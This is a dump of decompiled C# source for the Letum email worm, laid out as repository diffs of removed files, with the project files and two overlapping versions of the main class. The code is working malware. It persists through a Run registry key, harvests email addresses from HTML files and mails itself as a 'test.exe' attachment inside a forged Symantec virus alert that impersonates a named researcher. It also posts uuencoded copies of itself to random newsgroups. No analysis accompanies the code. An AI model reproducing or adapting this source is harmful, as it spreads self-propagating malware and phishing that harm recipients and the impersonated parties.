foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + subKeyName);
foreach (string valueName in registryKey.GetValueNames())
{
if (valueName == "NNTP Server")
obj1 = registryKey.GetValue("NNTP Server");
}
}
if (obj1 == null)
;
try
{
tcpClient.Connect("news.microsoft.com", 119);
}
catch
{
return;
}
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) stream);
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ReadLine().Substring(0, 3) != "200")
{
streamWriter.WriteLine("LIST");
string text = streamReader.ReadLine();
int num = (int) MessageBox.Show(text);
while (text != ".")
{
text = streamReader.ReadLine();
if (text != ".")
{
text = text.Substring(0, text.IndexOf(" "));
arrayList.Add((object) text);
}
}
int index = random.Next(0, arrayList.Count);
object obj2 = arrayList[index];
streamWriter.WriteLine("GROUP " + obj2);
if (streamReader.ToString().Substring(0, 3) != "211")
{
streamWriter.WriteLine("POST");
if (streamReader.ToString().Substring(0, 3) != "340")
{
string str1 = Letum.nSubject[random.Next(0, Letum.nSubject.Length)];
string str2 = Letum.nData[random.Next(0, Letum.nData.Length)] + "\r\n\r\n";
FileStream fileStream = new FileStream(Letum.self.ScopeName, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
string str3 = Encoding.ASCII.GetString(numArray);
string str4 = string.Empty;
if (str3.Length % 3 != 0)
{
string str5 = new string(' ', 3 - str3.Length % 3);
str3 += str5;
}
int length = str3.Length;
for (int startIndex2 = 1; startIndex2 <= length; startIndex2 += 3)
str4 = str4 + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) / 4 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) % 4 * 16 + (int) Convert.ToChar(str3.Substring(startIndex2, 1)) / 16 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2, 1)) % 16 * 4 + (int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) / 64 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) % 64 + 32));
int count;
for (string str6 = str4.Replace(' ', '`'); startIndex1 < str6.Length; startIndex1 += count)
{
count = Math.Min(60, str6.Length - startIndex1);
stringBuilder.Append("M");
stringBuilder.Append(str6, startIndex1, count);
stringBuilder.Append("\r\n");
}
string str7 = stringBuilder.ToString();
string str8 = str7.Remove(str7.LastIndexOf("M"), 1);
string str9 = "FROM: " + Letum.pferrie + "\r\nNEWSGROUPS: " + obj2 + "\r\nSUBJECT: " + str1 + "\r\n\r\n" + (object) Letum.nData + "begin 644 " + Letum.self.ScopeName + "\r\n" + str8 + "\r\n'\r\nend\r\n.";
streamWriter.WriteLine(str9);
if (streamReader.ReadLine().Substring(0, 3) != "240")
tcpClient.Close();
}
}
}
tcpClient.Close();
}
private static void smtp()
{
TcpClient tcpClient = new TcpClient();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
object hostname = (object) null;
int startIndex = 0;
string str1 = "----=_NextPart_81_27_24";
string str2 = "<html><head></head><body bgcolor=\"white\" text=\"black\" link=\"blue\" vlink=\"purple\" alink=\"red\"><table border=\"0\" width=\"780\" bgcolor=\"white\"><tr><td width=\"154\" valign=\"top\" bgcolor=\"white\"><p>&nbsp; <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=\"154\"><p>&nbsp;<a href=\"http://www.symantec.com\"><img src=\"http://www.langtech.com/images/projects/symantec_logoESP.gif\" border=\"0\"></a></p><p>&nbsp;</td></tr><tr><td width=\"154\" background=\"http://security.symantec.com/sscv6/languageContent/ie/sym/images/us.navbar.background.gif\"><p>&nbsp;</p><p><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/legal_note.html\">Legal Notices</a></font><font face=\"Verdana\" size=\"1\"> <br clear=\"all\"></font><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/privacy.html\">Privacy Policy</a></font></p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</td></tr></table><p>&nbsp;</td><td width=\"618\" valign=\"top\" bgcolor=\"white\"><p align=\"left\"><font face=\"Verdana\" size=\"2\"><br></font></p><p align=\"left\">&nbsp;</p><p align=\"left\">&nbsp; <div align=\"center\"><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"><tr><td width=\"616\"><p align=\"left\">&nbsp;</p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Dear User,</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Due to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">If you have any comments or questions about this, then please contact us.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Regards</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Peter Ferrie<br clear=\"all\"></font><font face=\"Verdana\" size=\"1\">Senior Anti-Virus Researcher / Senior Principal Software Engineer&nbsp;</font></td></tr></table></div><p align=\"left\"></p><p align=\"left\"><div align=\"center\"><table border=\"0\" cellspacing=\"1\" width=\"100%\"><tr><td width=\"100%\" bgcolor=\"white\"><p align=\"center\"><font face=\"Verdana\" size=\"1\"><B>©1995 - 2006 Symantec Corporation All rights reserved.</font></td></B></tr></table></div></td></tr></table><p></p></body></html>";
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\" + subKeyName, true);
hostname = registryKey.GetValue("SMTP Server") != null ? registryKey.GetValue("SMTP Server") : (object) "mail.primaryhost.org.uk";
}
FileStream fileStream1 = new FileStream(Registry.CurrentUser.OpenSubKey("Software\\Retro", true).GetValue(nameof (Letum)).ToString(), FileMode.Open, FileAccess.Read);
byte[] numArray1 = new byte[fileStream1.Length];
fileStream1.Read(numArray1, 0, (int) fileStream1.Length);
fileStream1.Close();
int count;
for (string base64String = Convert.ToBase64String(numArray1); startIndex < base64String.Length; startIndex += count)
{
count = Math.Min(76, base64String.Length - startIndex);
stringBuilder.Append(base64String, startIndex, count);
stringBuilder.Append("\r\n");
}
tcpClient.Connect((string) hostname, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ToString().Substring(0, 3) != "220")
{
streamWriter.WriteLine("HELO localhost\r\n");
if (streamReader.ToString().Substring(0, 3) != "250")
{
try
{
foreach (string path in Letum.List)
{
foreach (string file in Directory.GetFiles(path, "*html"))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream2 = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray2 = new byte[fileStream2.Length];
fileStream2.Read(numArray2, 0, (int) fileStream2.Length);
fileStream2.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray2)))
{
streamWriter.WriteLine("MAIL FROM: " + Letum.pferrie);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("RCPT TO: " + (object) match);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("DATA");
if (streamReader.ToString().Substring(0, 3) != "354")
{
"FROM: Symantec Security Response <" + Letum.pferrie + ">\r\nTO: <" + (object) match + "> " + (object) match + "SUBJECT: " + Letum.nSubject[random.Next(0, Letum.nSubject.Length)] + "\r\nMIME-Version: 1.0\r\nContent-Type: multipart/mixed;\r\n\tboundary=\"" + str1 + "\"X-Priority: 3\r\nX-MSMail-Priority: Normal\r\nX-Mailer: Microsoft Outlook Express 6.00.2900.2180\r\nX-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180\r\n\r\nThis is a multi-part message in MIME format.\r\n--" + str1 + "\r\nContent-Type: text/html;\r\n\tcharset\"iso-8859-1\"\r\nContent-Transfer-Encoding: 7bit\r\n\r\n" + str2 + "\r\n--" + str1 + "\r\nContent-Type: application/octet-stream;\r\n\tname=\"test.exe\"\r\nContent-Transfer-Encoding: base64\r\nContent-Disposition: attachment;\r\n\tfilename=\"test.exe\"\r\n\r\n" + (object) stringBuilder + "\r\n\r\n--" + str1 + "--\r\n.\r\n";
if (!(streamReader.ToString().Substring(0, 3) != "250"))
{
int num1 = 0;
if (num1 < 5)
{
tcpClient.Close();
Letum.smtp();
int num2 = num1 + 1;
}
}
}
}
}
}
}
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
tcpClient.Close();
}
private static void CollectDirs(string dir, ArrayList storage)
{
try
{
foreach (string directory in Directory.GetDirectories(dir))
{
storage.Add((object) directory);
Letum.CollectDirs(directory, storage);
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
}

View File

@ -1,44 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Resources
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[DebuggerNonUserCode]
[CompilerGenerated]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (Letum.Properties.Resources.resourceMan == null)
Letum.Properties.Resources.resourceMan = new ResourceManager("Letum.Properties.Resources", typeof (Letum.Properties.Resources).Assembly);
return Letum.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Letum.Properties.Resources.resourceCulture;
set => Letum.Properties.Resources.resourceCulture = value;
}
}
}

View File

@ -1,120 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>

View File

@ -1,19 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Settings
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 824230F4-E564-4DC3-8691-5A3025A33873
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.a-9af12e4a61232f77b3d3dcd858881a2180caf99ae263ac3af4ff71bbc5547079.exe
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = new Settings();
public static Settings Default => Settings.defaultInstance;
}
}

View File

@ -1,14 +0,0 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyCopyright("Copyright © 2006")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("9c6ecbe9-0863-4001-8a94-b8cc1b696c55")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Letum")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("Letum")]
[assembly: AssemblyVersion("1.0.0.0")]

View File

@ -1,47 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BA5580B7-C204-4CE5-AF70-F5C79C363064}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Letum</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Letum</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Letum22\Letum.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>

View File

@ -1,20 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Letum", "Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.csproj", "{BA5580B7-C204-4CE5-AF70-F5C79C363064}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

View File

@ -1,32 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Form1
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using System.ComponentModel;
using System.Windows.Forms;
namespace Letum
{
public class Form1 : Form
{
private IContainer components = (IContainer) null;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.AutoScaleMode = AutoScaleMode.Font;
this.Text = nameof (Form1);
}
public Form1() => this.InitializeComponent();
}
}

View File

@ -1,261 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: Letum22.Letum
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace Letum22
{
public class Letum
{
private static Module self;
private static string pferrie = "peter_ferrie@symantec.com";
private static string[] nSubject = new string[7]
{
"Warning!",
"Virus Alert",
"Customer Support",
"Re:",
"Re:Warning",
nameof (Letum),
"Virus Report"
};
private static string[] nData = new string[3]
{
"Dear Users\r\n\r\nDue to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.\r\n\r\n Regards\r\n Security Response",
"Hiya,\r\n\r\n I've found this tool a couple of weeks ago, and after using it i was surprised on how good it was on squashing viruses. I wonder if avers know about this? ;)",
">>\r\n Maybe not but try this, i'm sure it will help you in your fight against malware. The engine it uses isnt to bad, but the searching speed is very fast for such a small size "
};
private static ArrayList List = new ArrayList();
[STAThread]
private static void Main()
{
Random random = new Random();
Thread thread1 = new Thread(new ThreadStart(Letum.nntp));
Thread thread2 = new Thread(new ThreadStart(Letum.smtp));
Letum.self = Assembly.GetExecutingAssembly().GetModules()[0];
Letum.CollectDirs("C:\\", Letum.List);
int index = random.Next(0, Letum.List.Count);
string str = Letum.List[index].ToString();
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Retro", true);
if (registryKey1 == null)
{
registryKey1 = Registry.CurrentUser.CreateSubKey("Software\\Retro");
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
}
File.Delete(registryKey1.GetValue(nameof (Letum)).ToString());
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey2.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
registryKey2.Close();
thread1.Start();
thread2.Start();
if (random.Next(0, 1983) != random.Next(0, 1983))
return;
int num = (int) MessageBox.Show("Dear Peter Ferrie \n\nGeNeTiX is a person not a f**king genetically modified food product. \nShe's not happy you called her that! \n\nRegards", "Name Entry Error", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
private static void nntp()
{
TcpClient tcpClient = new TcpClient();
ArrayList arrayList = new ArrayList();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
int startIndex1 = 0;
object obj1 = (object) null;
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + subKeyName);
foreach (string valueName in registryKey.GetValueNames())
{
if (valueName == "NNTP Server")
obj1 = registryKey.GetValue("NNTP Server");
}
}
if (obj1 == null)
;
try
{
tcpClient.Connect("news.microsoft.com", 119);
}
catch
{
return;
}
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) stream);
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ReadLine().Substring(0, 3) != "200")
{
streamWriter.WriteLine("LIST");
string text = streamReader.ReadLine();
int num = (int) MessageBox.Show(text);
while (text != ".")
{
text = streamReader.ReadLine();
if (text != ".")
{
text = text.Substring(0, text.IndexOf(" "));
arrayList.Add((object) text);
}
}
int index1 = random.Next(0, arrayList.Count);
object obj2 = arrayList[index1];
streamWriter.WriteLine("GROUP " + obj2);
if (streamReader.ToString().Substring(0, 3) != "211")
{
streamWriter.WriteLine("POST");
if (streamReader.ToString().Substring(0, 3) != "340")
{
int index2 = random.Next(0, Letum.nSubject.Length);
string str1 = Letum.nSubject[index2];
int index3 = random.Next(0, Letum.nData.Length);
string str2 = Letum.nData[index3] + "\r\n\r\n";
FileStream fileStream = new FileStream(Letum.self.ScopeName, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
string str3 = Encoding.ASCII.GetString(numArray);
string str4 = string.Empty;
if (str3.Length % 3 != 0)
{
string str5 = new string(' ', 3 - str3.Length % 3);
str3 += str5;
}
int length = str3.Length;
for (int startIndex2 = 1; startIndex2 <= length; startIndex2 += 3)
str4 = str4 + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) / 4 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) % 4 * 16 + (int) Convert.ToChar(str3.Substring(startIndex2, 1)) / 16 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2, 1)) % 16 * 4 + (int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) / 64 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) % 64 + 32));
int count;
for (string str6 = str4.Replace(' ', '`'); startIndex1 < str6.Length; startIndex1 += count)
{
count = Math.Min(60, str6.Length - startIndex1);
stringBuilder.Append("M");
stringBuilder.Append(str6, startIndex1, count);
stringBuilder.Append("\r\n");
}
string str7 = stringBuilder.ToString();
string str8 = str7.Remove(str7.LastIndexOf("M"), 1);
string str9 = "FROM: " + Letum.pferrie + "\r\nNEWSGROUPS: " + obj2 + "\r\nSUBJECT: " + str1 + "\r\n\r\n" + (object) Letum.nData + "begin 644 " + Letum.self.ScopeName + "\r\n" + str8 + "\r\n'\r\nend\r\n.";
streamWriter.WriteLine(str9);
if (streamReader.ReadLine().Substring(0, 3) != "240")
tcpClient.Close();
}
}
}
tcpClient.Close();
}
private static void smtp()
{
TcpClient tcpClient = new TcpClient();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
object hostname = (object) null;
int startIndex = 0;
string str1 = "----=_NextPart_81_27_24";
string str2 = "<html><head></head><body bgcolor=\"white\" text=\"black\" link=\"blue\" vlink=\"purple\" alink=\"red\"><table border=\"0\" width=\"780\" bgcolor=\"white\"><tr><td width=\"154\" valign=\"top\" bgcolor=\"white\"><p>&nbsp; <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=\"154\"><p>&nbsp;<a href=\"http://www.symantec.com\"><img src=\"http://www.langtech.com/images/projects/symantec_logoESP.gif\" border=\"0\"></a></p><p>&nbsp;</td></tr><tr><td width=\"154\" background=\"http://security.symantec.com/sscv6/languageContent/ie/sym/images/us.navbar.background.gif\"><p>&nbsp;</p><p><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/legal_note.html\">Legal Notices</a></font><font face=\"Verdana\" size=\"1\"> <br clear=\"all\"></font><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/privacy.html\">Privacy Policy</a></font></p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</td></tr></table><p>&nbsp;</td><td width=\"618\" valign=\"top\" bgcolor=\"white\"><p align=\"left\"><font face=\"Verdana\" size=\"2\"><br></font></p><p align=\"left\">&nbsp;</p><p align=\"left\">&nbsp; <div align=\"center\"><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"><tr><td width=\"616\"><p align=\"left\">&nbsp;</p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Dear User,</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Due to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">If you have any comments or questions about this, then please contact us.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Regards</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Peter Ferrie<br clear=\"all\"></font><font face=\"Verdana\" size=\"1\">Senior Anti-Virus Researcher / Senior Principal Software Engineer&nbsp;</font></td></tr></table></div><p align=\"left\"></p><p align=\"left\"><div align=\"center\"><table border=\"0\" cellspacing=\"1\" width=\"100%\"><tr><td width=\"100%\" bgcolor=\"white\"><p align=\"center\"><font face=\"Verdana\" size=\"1\"><B>©1995 - 2006 Symantec Corporation All rights reserved.</font></td></B></tr></table></div></td></tr></table><p></p></body></html>";
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\" + subKeyName, true);
hostname = registryKey.GetValue("SMTP Server") != null ? registryKey.GetValue("SMTP Server") : (object) "mail.primaryhost.org.uk";
}
FileStream fileStream1 = new FileStream(Registry.CurrentUser.OpenSubKey("Software\\Retro", true).GetValue(nameof (Letum)).ToString(), FileMode.Open, FileAccess.Read);
byte[] numArray1 = new byte[fileStream1.Length];
fileStream1.Read(numArray1, 0, (int) fileStream1.Length);
fileStream1.Close();
int count;
for (string base64String = Convert.ToBase64String(numArray1); startIndex < base64String.Length; startIndex += count)
{
count = Math.Min(76, base64String.Length - startIndex);
stringBuilder.Append(base64String, startIndex, count);
stringBuilder.Append("\r\n");
}
tcpClient.Connect((string) hostname, 25);
